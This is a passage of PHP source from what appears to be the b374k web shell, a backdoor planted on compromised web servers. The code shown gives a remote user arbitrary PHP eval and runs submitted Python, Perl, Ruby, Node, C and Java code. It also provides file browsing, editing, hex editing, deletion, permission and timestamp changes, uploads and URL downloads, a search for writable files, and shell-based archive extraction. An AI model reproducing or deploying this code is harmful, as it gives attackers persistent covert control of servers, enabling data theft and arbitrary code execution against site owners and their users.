                        $zip->close();
                    }
                    else $s_result .= notif("Error opening archive file");
                }
            }
            elseif(isset($_GP['extracttarok'])){
                $s_file = $_GP['extracttarok'];
                foreach($s_lists as $f){
                    $s_target = "";
                    $s_target = basename($f,".tar");
                    if(!@is_dir($s_target)) @mkdir($s_target);
                    exe("tar xf \"".basename($f)."\" -C \"".$s_target."\"");
                }
            }
            elseif(isset($_GP['extracttargzok'])){
                $s_file = $_GP['extracttargzok'];
                foreach($s_lists as $f){
                    $s_target = "";
                    if(strpos(strtolower($f), ".tar.gz")!==false) $s_target = basename($f,".tar.gz");
                    elseif(strpos(strtolower($f), ".tgz")!==false) $s_target = basename($f,".tgz");
                    if(!@is_dir($s_target)) @mkdir($s_target);
                    exe("tar xzf \"".basename($f)."\" -C \"".$s_target."\"");
                }
            }
        }
        setcookie("buffer", "" ,time() - $s_login_time);
        setcookie("massact", "" ,time() - $s_login_time);
    }
    if(isset($_GP['y'])){
        $s_massact = isset($_COOKIE['massact'])? $_COOKIE['massact']:"";
        $s_buffer = isset($_COOKIE['buffer'])? rtrim(ss($_COOKIE['buffer']),"|"):"";
        $s_lists = explode("|", $s_buffer);

        if(!empty($s_buffer)){
            if($_GP['y']=='delete'){
                $s_result .= notif("Delete ? <a href='".$s_self."z=delok"."'>Yes</a> | <a href='".$s_self."'>No</a>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='paste' && $s_massact=='cut'){
                $s_result .= notif("Move here ? <a href='".$s_self."z=moveok"."'>Yes</a> | <a href='".$s_self."'>No</a>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='paste' && $s_massact=='copy'){
                $s_result .= notif("Copy here ? <a href='".$s_self."z=copyok"."'>Yes</a> | <a href='".$s_self."'>No</a>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='chmod'){
                $s_result .= notif("Permissions ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='0755' name='chmodok' style='width:30px;text-align:center;' maxlength='4' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='touch'){
                $s_result .= notif("Touch ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".@date("d-M-Y H:i:s",time())."' name='touchok' style='width:130px;text-align:center;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='extractzip'){
                $s_result .= notif("Extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd)."' name='extractzipok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='extracttar'){
                $s_result .= notif("Extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd)."' name='extracttarok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='extracttargz'){
                $s_result .= notif("Extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd)."' name='extracttargzok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='compresszip'){
                $s_result .= notif("Compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd).substr(md5(time()),0,8).".zip' name='compresszipok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='compresstar'){
                $s_result .= notif("Compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd).substr(md5(time()),0,8).".tar' name='compresstarok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
            elseif($_GP['y']=='compresstargz'){
                $s_result .= notif("Compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd).substr(md5(time()),0,8).".tar.gz' name='compresstargzok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach($s_lists as $s_l) $s_result .= notif($s_l);
            }
        }
    }

    // view image specified by ?img=<file>
    if(isset($_GP['img'])){
        ob_end_clean();
        $s_d = isset($_GP['d'])? $_GP['d']:"";
        $s_f = $_GP['img'];
        $s_inf = @getimagesize($s_d.$s_f);
        $s_ext = explode($s_f, ".");
        $s_ext = $s_ext[count($s_ext)-1];
        header("Content-type: ".$s_inf["mime"]);
        header("Cache-control: public");
        header("Expires: ".@date("r", @mktime(0,0,0,1,1,2030)));
        header("Cache-control: max-age=".(60*60*24*7));#
        readfile($s_d.$s_f);
        die();
    } // rename file or folder
    elseif(isset($_GP['oldname']) && isset($_GP['rename'])){
        $s_old = $_GP['oldname'];
        $s_new = $_GP['rename'];

        $s_renmsg = "";
        if(@is_dir($s_old)) $s_renmsg = (@rename($s_old, $s_new))? "Directory ".$s_old." renamed to ".$s_new : "Unable to rename directory ".$s_old." to ".$s_new;
        elseif(@is_file($s_old)) $s_renmsg = (@rename($s_old, $s_new))? "File ".$s_old." renamed to ".$s_new : "Unable to rename file ".$s_old." to ".$s_new;
        else $s_renmsg = "Cannot find the path specified ".$s_old;

        $s_result .= notif($s_renmsg);
        $s_fnew = $s_new;
    } // confirm delete
    elseif(!empty($_GP['del'])){
        $s_del = trim($_GP['del']);
        $s_result .= notif("Delete ".basename($s_del)." ? <a href='".$s_self."delete=".pl($s_del)."'>Yes</a> | <a href='".$s_self."'>No</a>");
    } // delete file
    elseif(!empty($_GP['delete'])){
        $s_f = $_GP['delete'];
        $s_delmsg = "";

        if(@is_file($s_f)) $s_delmsg = (unlink($s_f))? "File removed : ".$s_f : "Unable to remove file ".$s_f;
        elseif(@is_dir($s_f)){
            rmdirs($s_f);
            $s_delmsg = (@is_dir($s_f))? "Unable to remove directory ".$s_f : "Directory removed : ".$s_f;
        }
        else $s_delmsg = "Cannot find the path specified ".$s_f;
        $s_result .= notif($s_delmsg);
    } // create dir
    elseif(!empty($_GP['mkdir'])){
        $s_f = $s_cwd.$_GP['mkdir'];
        $s_dirmsg = "";

        $s_num = 1;
        if(@is_dir($s_f)){
            $s_pos = strrpos($s_f,"_");
            if($s_pos!==false) $s_num = (int) substr($s_f, $s_pos+1);
            while(@is_dir(substr($s_f, 0, $s_pos)."_".$s_num)){
                $s_num++;
            }
            $s_f = substr($s_f, 0, $s_pos)."_".$s_num;
        }
        if(mkdir($s_f)) $s_dirmsg = "Directory created ".$s_f;
        else $s_dirmsg = "Unable to create directory ".$s_f;

        $s_result .= notif($s_dirmsg);
    } // php eval() function
    if(isset($_GP['x']) && ($_GP['x']=='eval')){
        $s_code = "";
        $s_res = "";
        $s_evaloption = "";
        $s_lang = "php";

        if(isset($_GP['evalcode'])){
            $s_code = $_GP['evalcode'];
            $s_evaloption = (isset($_GP['evaloption']))? $_GP['evaloption']:"";
            $s_tmpdir = get_writabledir();

            if(isset($_GP['lang'])){$s_lang = $_GP['lang'];}

            if(strtolower($s_lang)=='php'){
                ob_start();
                eval($s_code);
                $s_res = ob_get_contents();
                ob_end_clean();
            }
            elseif(strtolower($s_lang)=='python'||strtolower($s_lang)=='perl'||strtolower($s_lang)=='ruby'||strtolower($s_lang)=='node'||strtolower($s_lang)=='nodejs'){
                $s_rand = md5(time().rand(0,100));
                $s_script = $s_tmpdir.$s_rand;
                if(file_put_contents($s_script, $s_code)!==false){
                    $s_res = exe($s_lang." ".$s_evaloption." ".$s_script);
                    unlink($s_script);
                }
            }
            elseif(strtolower($s_lang)=='gcc'){
                $s_script = md5(time().rand(0,100));
                chdir($s_tmpdir);
                if(file_put_contents($s_script.".c", $s_code)!==false){
                    $s_scriptout = $s_win ? $s_script.".exe" : $s_script;
                    $s_res = exe("gcc ".$s_script.".c -o ".$s_scriptout.$s_evaloption);
                    if(@is_file($s_scriptout)){
                        $s_res = $s_win ? exe($s_scriptout):exe("chmod +x ".$s_scriptout." ; ./".$s_scriptout);
                        rename($s_scriptout, $s_scriptout."del");
                        unlink($s_scriptout."del");
                    }
                    unlink($s_script.".c");
                }
                chdir($s_cwd);
            }
            elseif(strtolower($s_lang)=='java'){
                if(preg_match("/class\ ([^{]+){/i",$s_code, $s_r)){
                    $s_classname = trim($s_r[1]);
                    $s_script = $s_classname;
                }
                else{
                    $s_rand = "b374k_".substr(md5(time().rand(0,100)),0,8);
                    $s_script = $s_rand;
                    $s_code = "class ".$s_rand." { ".$s_code . " } ";
                }
                chdir($s_tmpdir);
                if(file_put_contents($s_script.".java", $s_code)!==false){
                    $s_res = exe("javac ".$s_script.".java");
                    if(@is_file($s_script.".class")){
                        $s_res .= exe("java ".$s_evaloption." ".$s_script);
                        unlink($s_script.".class");
                    }
                    unlink($s_script.".java");
                }
                chdir($s_pwd);
            }
        }

        $s_lang_available = "<option value='php'>php</option>";
        $s_selected = "";
        $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_javac");
        foreach($s_access as $s){
            if(isset($$s)){
                $s_t = explode("_", $s);
                $s_checked = ($s_lang == $s_t[1])? "selected" : "";
                $s_lang_available .= "<option value='".$s_t[1]."' ".$s_checked.">".$s_t[1]."</option>";
            }
        }

        $s_evaloptionclass = ($s_lang=="php")? "sembunyi":"";
        $s_e_result = (!empty($s_res))? "<pre id='evalres' class='bt' style='margin:4px 0 0 0;padding:6px 0;' >".hss($s_res)."</pre>":"";
        $s_result .= "<form action='".$s_self."' method='post'>
                    <textarea id='evalcode' name='evalcode' style='height:150px;' class='txtarea'>".hss($s_code)."</textarea>
                    <table><tr><td style='padding:0;'><p><input type='submit' name='evalcodesubmit' class='inputzbut' value='Go !' style='width:120px;height:30px;' /></p>
                    </td><td><select name='lang' onchange='evalselect(this);' class='inputzbut' style='width:120px;height:30px;padding:4px;'>
                    ".$s_lang_available."
                    </select>
                    </td>
                    <td><div title='If you want to give additional option to interpreter or compiler, give it here' id='additionaloption' class='".$s_evaloptionclass."'>Additional option&nbsp;&nbsp;<input class='inputz' style='width:400px;' type='text' name='evaloption' value='".hss($s_evaloption)."' id='evaloption' /></div></td>
                    </tr>
                    </table>
                    ".$s_e_result."
                    <input type='hidden' name='x' value='eval' />
                    </form>";
    } // find
    elseif(isset($_GP['find'])){
        $s_p = $_GP['find'];

        $s_type = isset($_GP['type'])? $_GP['type'] : "sfile";
        $s_sfname = (!empty($_GP['sfname']))? $_GP['sfname']:'';
        $s_sdname = (!empty($_GP['sdname']))? $_GP['sdname']:'';
        $s_sfcontain = (!empty($_GP['sfcontain']))? $_GP['sfcontain']:'';

        $s_sfnameregexchecked = $s_sfnameicasechecked = $s_sdnameregexchecked = $s_sdnameicasechecked = $s_sfcontainregexchecked = $s_sfcontainicasechecked = $s_swritablechecked = $s_sreadablechecked = $s_sexecutablechecked = "";
        $s_sfnameregex = $s_sfnameicase = $s_sdnameregex = $s_sdnameicase = $s_sfcontainregex = $s_sfcontainicase = $s_swritable = $s_sreadable = $s_sexecutable = false;

        if(isset($_GP['sfnameregex'])){ $s_sfnameregex=true; $s_sfnameregexchecked="checked"; }
        if(isset($_GP['sfnameicase'])){ $s_sfnameicase=true; $s_sfnameicasechecked="checked"; }
        if(isset($_GP['sdnameregex'])){ $s_sdnameregex=true; $s_sdnameregexchecked="checked"; }
        if(isset($_GP['sdnameicase'])){ $s_sdnameicase=true; $s_sdnameicasechecked="checked"; }
        if(isset($_GP['sfcontainregex'])){ $s_sfcontainregex=true; $s_sfcontainregexchecked="checked"; }
        if(isset($_GP['sfcontainicase'])){ $s_sfcontainicase=true; $s_sfcontainicasechecked="checked"; }
        if(isset($_GP['swritable'])){ $s_swritable=true; $s_swritablechecked="checked"; }
        if(isset($_GP['sreadable'])){ $s_sreadable=true; $s_sreadablechecked="checked"; }
        if(isset($_GP['sexecutable'])){ $s_sexecutable=true; $s_sexecutablechecked="checked"; }

        $s_sexecb = (function_exists("is_executable"))? "<input class='css-checkbox' type='checkbox' name='sexecutable' value='sexecutable' id='se' ".$s_sexecutablechecked." /><label class='css-label' for='se'>Executable</span>":"";

        $s_candidate = array();
        if(isset($_GP['sgo'])){
            $s_af = "";

            $s_candidate = getallfiles($s_p);
            if($s_type=='sfile') $s_candidate = @array_filter($s_candidate, "is_file");
            elseif($s_type=='sdir') $s_candidate = @array_filter($s_candidate, "is_dir");

            foreach($s_candidate as $s_a){
                if($s_type=='sdir'){
                    if(!empty($s_sdname)){
                        if($s_sdnameregex){
                            if($s_sdnameicase){if(!preg_match("/".$s_sdname."/i", basename($s_a))) $s_candidate = array_diff($s_candidate, array($s_a));}
                            else{if(!preg_match("/".$s_sdname."/", basename($s_a))) $s_candidate = array_diff($s_candidate, array($s_a));}
                        }
                        else{
                            if($s_sdnameicase){if(strpos(strtolower(basename($s_a)), strtolower($s_sdname))===false) $s_candidate = array_diff($s_candidate, array($s_a));}
                            else{if(strpos(basename($s_a), $s_sdname)===false) $s_candidate = array_diff($s_candidate, array($s_a));}
                        }
                    }
                }
                elseif($s_type=='sfile'){
                    if(!empty($s_sfname)){
                        if($s_sfnameregex){
                            if($s_sfnameicase){if(!preg_match("/".$s_sfname."/i", basename($s_a))) $s_candidate = array_diff($s_candidate, array($s_a));}
                            else{if(!preg_match("/".$s_sfname."/", basename($s_a))) $s_candidate = array_diff($s_candidate, array($s_a));}
                        }
                        else{
                            if($s_sfnameicase){if(strpos(strtolower(basename($s_a)), strtolower($s_sfname))===false) $s_candidate = array_diff($s_candidate, array($s_a));}
                            else{if(strpos(basename($s_a), $s_sfname)===false) $s_candidate = array_diff($s_candidate, array($s_a));}
                        }
                    }
                    if(!empty($s_sfcontain)){
                        $s_sffcontent = @fgc($s_a);
                        if($s_sfcontainregex){
                            if($s_sfcontainicase){if(!preg_match("/".$s_sfcontain."/i", $s_sffcontent)) $s_candidate = array_diff($s_candidate, array($s_a));}
                            else{if(!preg_match("/".$s_sfcontain."/",  $s_sffcontent)) $s_candidate = array_diff($s_candidate, array($s_a));}
                        }
                        else{
                            if($s_sfcontainicase){if(strpos(strtolower($s_sffcontent), strtolower($s_sfcontain))===false) $s_candidate = array_diff($s_candidate, array($s_a));}
                            else{if(strpos($s_sffcontent, $s_sfcontain)===false) $s_candidate = array_diff($s_candidate, array($s_a));}
                        }
                    }
                }
            }
        }

        $s_f_result = ""; $s_link="";
        foreach($s_candidate as $s_c){
            $s_c = trim($s_c);
            if($s_swritable && !@is_writable($s_c)) continue;
            if($s_sreadable && !@is_readable($s_c)) continue;
            if($s_sexecutable && !@is_executable($s_c)) continue;

            if($s_type=="sfile") $s_link = $s_self."view=".pl($s_c);
            elseif($s_type=="sdir") $s_link = $s_self."view=".pl(cp($s_c));
            $s_f_result .= "<p class='notif' ondblclick=\"return go('".adds($s_link)."',event);\"><a href='".$s_link."'>".$s_c."</a></p>";
        }

        $s_tsdir = ($s_type=="sdir")? "selected":"";
        $s_tsfile = ($s_type=="sfile")? "selected":"";

        if(!@is_dir($s_p)) $s_result .= notif("Cannot find the path specified ".$s_p);

        $s_result .= "<form action='".$s_self."' method='post'>
        <div class='mybox'><h2>Find</h2>
        <table class='myboxtbl'>
        <tr><td style='width:140px;'>Search in</td>
        <td colspan='2'><input style='width:100%;' value='".hss($s_p)."' class='inputz' type='text' name='find' /></td></tr>
        <tr onclick=\"findtype('sdir');\">
            <td>Dirname contains</td>
            <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sdname' value='".hss($s_sdname)."' /></td>
            <td>
                <input type='checkbox' class='css-checkbox' name='sdnameregex' id='sdn' ".$s_sdnameregexchecked." /><label class='css-label' for='sdn'>Regex (pcre)</label>
                <input type='checkbox' class='css-checkbox' name='sdnameicase' id='sdi' ".$s_sdnameicasechecked." /><label class='css-label' for='sdi'>Case Insensitive</label>
            </td>
        </tr>
        <tr onclick=\"findtype('sfile');\">
            <td>Filename contains</td>
            <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfname' value='".hss($s_sfname)."' /></td>
            <td>
                <input type='checkbox' class='css-checkbox' name='sfnameregex'  id='sfn' ".$s_sfnameregexchecked." /><label class='css-label' for='sfn'>Regex (pcre)</label>
                <input type='checkbox' class='css-checkbox' name='sfnameicase'  id='sfi' ".$s_sfnameicasechecked." /><label class='css-label' for='sfi'>Case Insensitive</label>
            </td>
        </tr>
        <tr onclick=\"findtype('sfile');\">
            <td>File contains</td>
            <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfcontain' value='".hss($s_sfcontain)."' /></td>
            <td>
                <input type='checkbox' class='css-checkbox' name='sfcontainregex' id='sff' ".$s_sfcontainregexchecked." /><label class='css-label' for='sff'>Regex (pcre)</label>
                <input type='checkbox' class='css-checkbox' name='sfcontainicase' id='sffi' ".$s_sfcontainicasechecked." /><label class='css-label' for='sffi'>Case Insensitive</label>
            </td>
        </tr>
        <tr>
            <td>Permissions</td>
            <td colspan='2'>
                <input type='checkbox' class='css-checkbox' name='swritable' id='sw' ".$s_swritablechecked." /><label class='css-label' for='sw'>Writable</label>
                <input type='checkbox' class='css-checkbox' name='sreadable' id='sr' ".$s_sreadablechecked." /><label class='css-label' for='sr'>Readable</label>
                ".$s_sexecb."
            </td>
        </tr>
        <tr><td>
        <input type='submit' name='sgo' class='inputzbut' value='Search !' style='width:120px;height:30px;margin:0;' />
        </td>
        <td>
        <select name='type' id='type' class='inputzbut' style='width:120px;height:30px;margin:0;padding:4px;'>
            <option value='sfile' ".$s_tsfile.">Search file</option>
            <option value='sdir' ".$s_tsdir.">Search dir</option>
        </select>
        </td>
        <td></td></tr>
        </table>
        </div>
        </form>
        <div>
        ".$s_f_result."
        </div>";
    } // upload
    elseif(isset($_GP['x']) && ($_GP['x']=='upload')){
        $s_result = " ";
        $s_msg = "";
        if(isset($_GP['uploadhd'])){
            $c = count($_FILES['filepath']['name']);
            for($i = 0; $i<$c; $i++){
                $s_fn = $_FILES['filepath']['name'][$i];
                if(empty($s_fn)) continue;
                if(is_uploaded_file($_FILES['filepath']['tmp_name'][$i])){
                    $s_p = cp($_GP['savefolder'][$i]);
                    if(!@is_dir($s_p)) mkdir($s_p);
                    if(isset($_GP['savefilename'][$i]) && (trim($_GP['savefilename'][$i])!="")) $s_fn = $_GP['savefilename'][$i];
                    $s_tm = $_FILES['filepath']['tmp_name'][$i];
                    $s_pi = cp($s_p).$s_fn;
                    $s_st = @move_uploaded_file($s_tm,$s_pi);
                    if($s_st) $s_msg .= notif("File uploaded to <a href='".$s_self."view=".pl($s_pi)."'>".$s_pi."</a>");
                    else $s_msg .= notif("Failed to upload ".$s_fn);
                }
                else $s_msg .= notif("Failed to upload ".$s_fn);
            }
        }
        elseif(isset($_GP['uploadurl'])){
            // function dlfile($s_url,$s_fpath)
            $c = count($_GP['fileurl']);
            for($i = 0; $i<$c; $i++){
                $s_fu = $_GP['fileurl'][$i];
                if(empty($s_fu)) continue;

                $s_p = cp($_GP['savefolderurl'][$i]);
                if(!@is_dir($s_p)) mkdir($s_p);

                $s_fn = basename($s_fu);
                if(isset($_GP['savefilenameurl'][$i]) && (trim($_GP['savefilenameurl'][$i])!="")) $s_fn = $_GP['savefilenameurl'][$i];
                $s_fp = cp($s_p).$s_fn;
                $s_st = dlfile($s_fu,$s_fp);
                if($s_st) $s_msg .= notif("File uploaded to <a href='".$s_self."view=".pl($s_fp)."'>".$s_fp."</a>");
                else $s_msg .= notif("Failed to upload ".$s_fn);
            }
        }
        else{
            if(!@is_writable($s_cwd)) $s_msg = notif("Directory ".$s_cwd." is not writable, please change to a writable one");
        }

        if(!empty($s_msg)) $s_result .= $s_msg;
        $s_result .= "
            <form action='".$s_self."' method='post' enctype='multipart/form-data'>
            <div class='mybox'><h2><div class='but' onclick='adduploadc();'>+</div>Upload from computer</h2>
            <table class='myboxtbl'>
            <tbody id='adduploadc'>
            <tr><td style='width:140px;'>File</td><td><input type='file' name='filepath[]' class='inputzbut' style='width:400px;margin:0;' /></td></tr>
            <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolder[]' value='".hss($s_cwd)."' /></td></tr>
            <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilename[]' value='' /></td></tr>
            </tbody>
            <tfoot>
            <tr><td>&nbsp;</td><td>
            <input type='submit' name='uploadhd' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
            <input type='hidden' name='x' value='upload' />
            </td></tr>
            </tfoot>
            </table>
            </div>
            </form>
            <form action='".$s_self."' method='post'>
            <div class='mybox'><h2><div class='but' onclick='adduploadi();'>+</div>Upload from internet</h2>
            <table class='myboxtbl'>
            <tbody id='adduploadi'>
            <tr><td style='width:150px;'>File URL</td><td><input style='width:100%;' class='inputz' type='text' name='fileurl[]' value='' />
            </td></tr>
            <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolderurl[]' value='".hss($s_cwd)."' /></td></tr>
            <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilenameurl[]' value='' /></td></tr>
            </tbody>
            <tfoot>
            <tr><td>&nbsp;</td><td>
            <input type='submit' name='uploadurl' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
            <input type='hidden' name='x' value='upload' />
            </td></tr>
            </table>
            </div>
            </form>";
    } // view file
    elseif(isset($_GP['view'])){
        $s_f = $_GP['view'];
        if(isset($s_fnew) && (trim($s_fnew)!="")) $s_f = $s_fnew;

        $s_owner = "";
        if(@is_file($s_f)){
            $targetdir = dirname($s_f);
            chdir($targetdir);
            $s_cwd = cp(getcwd());
            setcookie("cwd", $s_cwd ,time() + $s_login_time);

            if(!$s_win && $s_posix){
                $s_name = posix_getpwuid(fileowner($s_f));
                $s_group = posix_getgrgid(filegroup($s_f));
                $s_owner = "<tr><td>Owner</td><td>".$s_name['name']."<span class='gaya'>:</span>".$s_group['name']."</td></tr>";
            }
            $s_filn = basename($s_f);
            $s_result .= "<table class='viewfile' style='width:100%;'>
            <tr><td style='width:140px;'>Filename</td><td><span id='".cs($s_filn)."_link'>".$s_f."</span>
            <div id='".cs($s_filn)."_form' class='sembunyi'>
            <form action='".$s_self."' method='post'>
                <input type='hidden' name='oldname' value='".hss($s_f)."' style='margin:0;padding:0;' />
                <input type='hidden' name='view' value='".hss($s_f)."' />
                <input class='inputz' style='width:200px;' type='text' name='rename' value='".hss($s_f)."' />
                <input class='inputzbut' type='submit' value='rename' />
            </form>
            <input class='inputzbut' type='button' value='x' onclick=\"tukar_('".cs($s_filn)."_form','".cs($s_filn)."_link');\" />
            </div>
            </td></tr>
            <tr><td>Size</td><td>".gs($s_f)." (".@filesize($s_f).")</td></tr>
            <tr><td>Permission</td><td>".gp($s_f)."</td></tr>
            ".$s_owner."
            <tr><td>Create time</td><td>".@date("d-M-Y H:i:s",filectime($s_f))."</td></tr>
            <tr><td>Last modified</td><td>".@date("d-M-Y H:i:s",filemtime($s_f))."</td></tr>
            <tr><td>Last accessed</td><td>".@date("d-M-Y H:i:s",fileatime($s_f))."</td></tr>
            <tr><td>Actions</td><td>
            <a href='".$s_self."edit=".pl($s_f)."' title='edit'>edit</a> | <a href='".$s_self."hexedit=".pl($s_f)."' title='edit as hex'>hex</a> | <a href=\"javascript:tukar_('".cs($s_filn)."_link','".cs($s_filn)."_form');\" title='rename'>ren</a> | <a href='".$s_self."del=".pl($s_f)."' title='delete'>del</a> | <a href='".$s_self."dl=".pl($s_f)."'>dl</a>
            </td></tr>
            <tr><td>View</td><td>
            <a href='".$s_self."view=".pl($s_f)."&type=text"."'>text</a> | <a href='".$s_self."view=".pl($s_f)."&type=code"."'>code</a> | <a href='".$s_self."view=".pl($s_f)."&type=image"."'>image</a> | <a href='".$s_self."view=".pl($s_f)."&type=audio"."'>audio</a> | <a href='".$s_self."view=".pl($s_f)."&type=video"."'>video</a>
            </td></tr>
            </table>";

            $s_t = ""; $s_mime = "";
            $s_mime_list = gzinflate(base64_decode($s_mime_types));
            $s_ext_pos = strrpos($s_f, ".");
            if($s_ext_pos!==false){
                $s_ext = trim(substr($s_f, $s_ext_pos),".");
                if(preg_match("/([^\s]+)\ .*\b".$s_ext."\b.*/i",$s_mime_list,$s_r)){
                    $s_mime = $s_r[1];
                }
            }

            $s_iinfo = @getimagesize($s_f);
            if(strtolower(substr($s_filn,-3,3)) == "php") $s_t = "code";
            elseif(is_array($s_iinfo)) $s_t = 'image';
            elseif(!empty($s_mime)) $s_t = substr($s_mime,0,strpos($s_mime,"/"));

            if(isset($_GP['type'])) $s_t = $_GP['type'];

            if($s_t=="image"){
                $s_width = (int) $s_iinfo[0];
                $s_height = (int) $s_iinfo[1];
                $s_imginfo = "Image type = ( ".$s_iinfo['mime']." )<br />
                    Image Size = <span class='gaul'>( </span>".$s_width." x ".$s_height."<span class='gaul'> )</span><br />";
                if($s_width > 800){
                    $s_width = 800;
                    $s_imglink = "<p><a href='".$s_self."img=".pl($s_filn)."'>
                    <span class='gaul'>[ </span>view full size<span class='gaul'> ]</span></a></p>";
                }
                else $s_imglink = "";

                $s_result .= "<div class='viewfilecontent' style='text-align:center;'>".$s_imglink."
                    <img width='".$s_width."' src='".$s_self."img=".pl($s_filn)."' alt='".$s_filn."' style='margin:8px auto;padding:0;border:0;' /></div>";

            }
            elseif($s_t=="code"){
                $s_result .= "<div class=\"viewfilecontent\">";
                $s_file = wordwrap(@fgc($s_f),160,"\n",true);
                $s_buff = highlight_string($s_file,true);
                $s_old = array("0000BB", "000000", "FF8000", "DD0000", "007700");
                $s_new = ($s_theme=="bright")? $s_highlight_bright:$s_highlight_dark;
                $s_buff = str_replace($s_old,$s_new, $s_buff);
                $s_result .= $s_buff;
                $s_result .=  "</div>";
            }
            elseif($s_t=="audio" || $s_t=="video"){
                $s_result .= "<div class='viewfilecontent' style='text-align:center;'>
                            <".$s_t." controls>
                            <source src='".hss($s_self."dltype=raw&dlpath=".$s_f)."' type='".$s_mime."'>
                                <object data='".hss($s_self."dltype=raw&dlpath=".$s_f)."'>
                                    <embed src='".hss($s_self."dltype=raw&dlpath=".$s_f)."'>
                                </object>
                            </".$s_t.">
                            </div>";
            }
            else {
                $s_result .= "<pre style='padding: 3px 8px 0 8px;' class='viewfilecontent'>";
                $s_result .=  str_replace("<", "&lt;",str_replace(">", "&gt;",(wordwrap(@fgc($s_f),160,"\n",true))));
                $s_result .=   "</pre>";
            }
        }
        elseif(@is_dir($s_f)){
            chdir($s_f);
            $s_cwd = cp(getcwd());
            setcookie("cwd", $s_cwd ,time() + $s_login_time);
            $s_result .= showdir($s_cwd);
        }
        else $s_result .= notif("Cannot find the path specified ".$s_f);

    } // edit file
    elseif(isset($_GP['edit'])){
        $s_f = $_GP['edit'];
        $s_fc = ""; $s_fcs = "";

        if(isset($_GP['new']) && ($_GP['new']=='yes')){
            $s_num = 1;
            if(@is_file($s_f)){
                $s_pos = strrpos($s_f,"_");
                if($s_pos!==false) $s_num = (int) substr($s_f,$s_pos+1);
                while(@is_file(substr($s_f,0,$s_pos)."_".$s_num)){
                    $s_num++;
                }
                $s_f = substr($s_f,0,$s_pos)."_".$s_num;
            }
        }
        else if(@is_file($s_f)) $s_fc = @fgc($s_f);

        if(isset($_GP['fc'])){
            $s_fc = $_GP['fc'];
            $s_eol = $_GP['eol'];
            $s_eolf = pack("H*", geol($s_fc));
            $s_eolh = pack("H*", $s_eol);
            $s_fc = str_replace($s_eolf, $s_eolh, $s_fc);

            if($s_filez = fopen($s_f,"w")){
                $s_time = @date("d-M-Y H:i:s",time());
                if(fwrite($s_filez,$s_fc)!==false) $s_fcs = "File saved @ ".$s_time;
                else $s_fcs = "Failed to save";
                fclose($s_filez);
            }
            else $s_fcs = "Permission denied";
        }
        elseif(@is_file($s_f) && !@is_writable($s_f)) $s_fcs = "This file is not writable";

        $s_eol = geol($s_fc);

        if(!empty($s_fcs)) $s_result .= notif($s_fcs);
        $s_result .= "<form action='".$s_self."' method='post'>
                <textarea id='fc' name='fc' class='txtarea'>".hss($s_fc)."</textarea>
                <p style='text-align:center;'><input type='text' class='inputz' style='width:99%;' name='edit' value='".hss($s_f)."' /></p>
                <p><input type='submit' class='inputzbut' value='Save !' style='width:120px;height:30px;' /></p>
                <input type='hidden' name='eol' value='".$s_eol."' />
                </form>";

    } // hex edit file
    elseif(isset($_GP['hexedit'])){
        $s_f = $_GP['hexedit'];
        $s_fc = ""; $s_fcs = ""; $s_hexes = "";
        $s_lnum = 0;

        if(!empty($_GP['hx']) || !empty($_GP['hxt'])){
            if(!empty($_GP['hx'])){
                foreach($_GP['hx'] as $s_hex) $s_hexes .= str_replace(" ", "", $s_hex);
            }
            elseif(!empty($_GP['hxt'])){
                $s_hexes = trim($_GP['hxt']);
            }
            if($s_filez = fopen($s_f,"w")){
                    $s_bins = pack("H*", $s_hexes);
                    $s_time = @date("d-M-Y H:i:s", time());
                    if(fwrite($s_filez,$s_bins)!==false) $s_fcs = "File saved @ ".$s_time;
                    else $s_fcs = "Failed to save";
                    fclose($s_filez);
                }
            else $s_fcs = "Permission denied";
        }
        else if(@is_file($s_f) && !@is_writable($s_f)) $s_fcs = "This file is not writable";

        if(!empty($s_fcs)) $s_result .= notif($s_fcs);

